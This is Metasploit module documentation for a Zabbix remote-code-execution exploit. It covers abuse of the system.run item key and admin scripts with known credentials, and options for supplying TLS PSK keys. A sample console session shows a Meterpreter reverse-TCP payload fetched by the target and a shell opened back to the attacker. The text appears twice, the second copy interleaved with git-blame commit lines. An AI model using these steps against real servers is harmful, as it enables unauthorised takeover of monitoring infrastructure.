documentation/modules/exploit/multi/http/zabbix_script_exec.md

## Vulnerable Application

### Description

Zabbix server allow remote command execution by two different way.

The first way happen with the directive `AllowKey=system.run[*]` [[1]](https://blog.zabbix.com/zabbix-remote-commands/7500/#system.run).

This directive is disabled by default, if an attacker already know Zabbix credentials 
and the directive is enabled, he can abuse this functionality to take control over the Zabbix server.

The second way is by creating a script 
[[2]](https://www.zabbix.com/documentation/devel/en/manual/web_interface/frontend_sections/administration/scripts) 
in Zabbix and use it on a host.

### Setup

An easy way to setup a Zabbix server is to download and run their [appliance](https://www.zabbix.com/download_appliance).

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This uses a Linux dropper to execute code.

### 1

This executes a Unix command.

## Options

### TECHNIQUE

#### script
If this option is set, the exploit will try to use a script, in order to achieve RCE.

#### item
If this option is set, the exploit will try to use the key `system.run[*]` in an item, in order to achieve RCE, only works in Zabix >= 3.0.
This only work on a non default Zabbix server configuration, where 
the directive `AllowKey=system.run[*]` is enabled in the `zabbix-agentd.conf` file.

### TLS_PSK
Communication between an agent and the server can be encrypted with TLS using a PSK (pre-shared key).

If the server is configured to enforce that, you have to get the key from the web interface (browse inside a host 
and navigate to `Encryption` tab) and specify it with this option, otherwise RCE is not gonna happen.

### TLS_PSK_IDENTITY

This is also inside an host, in the `Encryption` tab.

## Scenarios

### Zabbix server from [VMWare](#setup).

```
msf6 > use exploit/multi/http/zabbix_script_exec
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/zabbix_script_exec) > set RHOSTS 192.168.0.130
RHOSTS => 192.168.0.130
msf6 exploit(multi/http/zabbix_script_exec) > set USE_ITEM true
USE_ITEM => true
msf6 exploit(multi/http/zabbix_script_exec) > set LHOST eth0
LHOST => 192.168.0.129
msf6 exploit(multi/http/zabbix_script_exec) > run
[*] Started reverse TCP handler on 192.168.0.129:4444 
[+] Successfully logged in
[*] Getting a valid group id...
[*] Creating a host called kTsSUTGmgKCwcsbMjZ
[*] Using URL: http://0.0.0.0:8081/4J54NLVPQsj
[*] Local IP: http://127.0.0.1:8081/4J54NLVPQsj
[*] Creating an item called MkMczJNYyEoSBTwsBG
[*] Client 192.168.0.130 (curl/7.25.0 (i586-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0) requested /4J54NLVPQsj
[*] Sending payload to 192.168.0.130 (curl/7.25.0 (i586-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0)
[*] Sending stage (984904 bytes) to 192.168.0.130
[*] Meterpreter session 1 opened (192.168.0.129:4444 -> 192.168.0.130:33354 ) at 2022-01-08 01:20:47 +0000
[*] Server stopped.

meterpreter > getuid
Server username: zabbix
meterpreter > 
```
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00			`## Vulnerable Application`

			`### Description`

			`Zabbix server allow remote command execution by two different way.`

			The first way happen with the directive `AllowKey=system.run[*]` [[1]](https://blog.zabbix.com/zabbix-remote-commands/7500/#system.run).

			`This directive is disabled by default, if an attacker already know Zabbix credentials`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`and the directive is enabled, he can abuse this functionality to take control over the Zabbix server.`
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00
			`The second way is by creating a script`
			`[[2]](https://www.zabbix.com/documentation/devel/en/manual/web_interface/frontend_sections/administration/scripts)`
			`in Zabbix and use it on a host.`

			`### Setup`

			`An easy way to setup a Zabbix server is to download and run their [appliance](https://www.zabbix.com/download_appliance).`

			`## Verification Steps`

			`Follow [Setup](#setup) and [Scenarios](#scenarios).`

			`## Targets`

			`### 0`

			`This uses a Linux dropper to execute code.`

			`### 1`

			`This executes a Unix command.`

			`## Options`

Linted with Rubocop, factorized API call, fixed some grammmar 2022-02-01 13:29:30 -08:00			`### TECHNIQUE`
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00
Linted with Rubocop, factorized API call, fixed some grammmar 2022-02-01 13:29:30 -08:00			`#### script`
			`If this option is set, the exploit will try to use a script, in order to achieve RCE.`

			`#### item`
Cleanup some minor typos 2022-02-04 15:12:57 -05:00			If this option is set, the exploit will try to use the key `system.run[*]` in an item, in order to achieve RCE, only works in Zabix >= 3.0.
Fixed few bugs 2022-02-02 14:30:02 -08:00			`This only work on a non default Zabbix server configuration, where`
			the directive `AllowKey=system.run[*]` is enabled in the `zabbix-agentd.conf` file.
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00
			`### TLS_PSK`
			`Communication between an agent and the server can be encrypted with TLS using a PSK (pre-shared key).`

			`If the server is configured to enforce that, you have to get the key from the web interface (browse inside a host`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			and navigate to `Encryption` tab) and specify it with this option, otherwise RCE is not gonna happen.
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00
			`### TLS_PSK_IDENTITY`

			This is also inside an host, in the `Encryption` tab.

			`## Scenarios`

			`### Zabbix server from [VMWare](#setup).`

			```
			`msf6 > use exploit/multi/http/zabbix_script_exec`
			`[*] Using configured payload linux/x86/meterpreter/reverse_tcp`
			`msf6 exploit(multi/http/zabbix_script_exec) > set RHOSTS 192.168.0.130`
			`RHOSTS => 192.168.0.130`
			`msf6 exploit(multi/http/zabbix_script_exec) > set USE_ITEM true`
			`USE_ITEM => true`
			`msf6 exploit(multi/http/zabbix_script_exec) > set LHOST eth0`
			`LHOST => 192.168.0.129`
			`msf6 exploit(multi/http/zabbix_script_exec) > run`
			`[*] Started reverse TCP handler on 192.168.0.129:4444`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] Successfully logged in`
Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00			`[*] Getting a valid group id...`
			`[*] Creating a host called kTsSUTGmgKCwcsbMjZ`
			`[*] Using URL: http://0.0.0.0:8081/4J54NLVPQsj`
			`[*] Local IP: http://127.0.0.1:8081/4J54NLVPQsj`
			`[*] Creating an item called MkMczJNYyEoSBTwsBG`
			`[*] Client 192.168.0.130 (curl/7.25.0 (i586-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0) requested /4J54NLVPQsj`
			`[*] Sending payload to 192.168.0.130 (curl/7.25.0 (i586-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0)`
			`[*] Sending stage (984904 bytes) to 192.168.0.130`
			`[*] Meterpreter session 1 opened (192.168.0.129:4444 -> 192.168.0.130:33354 ) at 2022-01-08 01:20:47 +0000`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: zabbix`
			`meterpreter >`
			```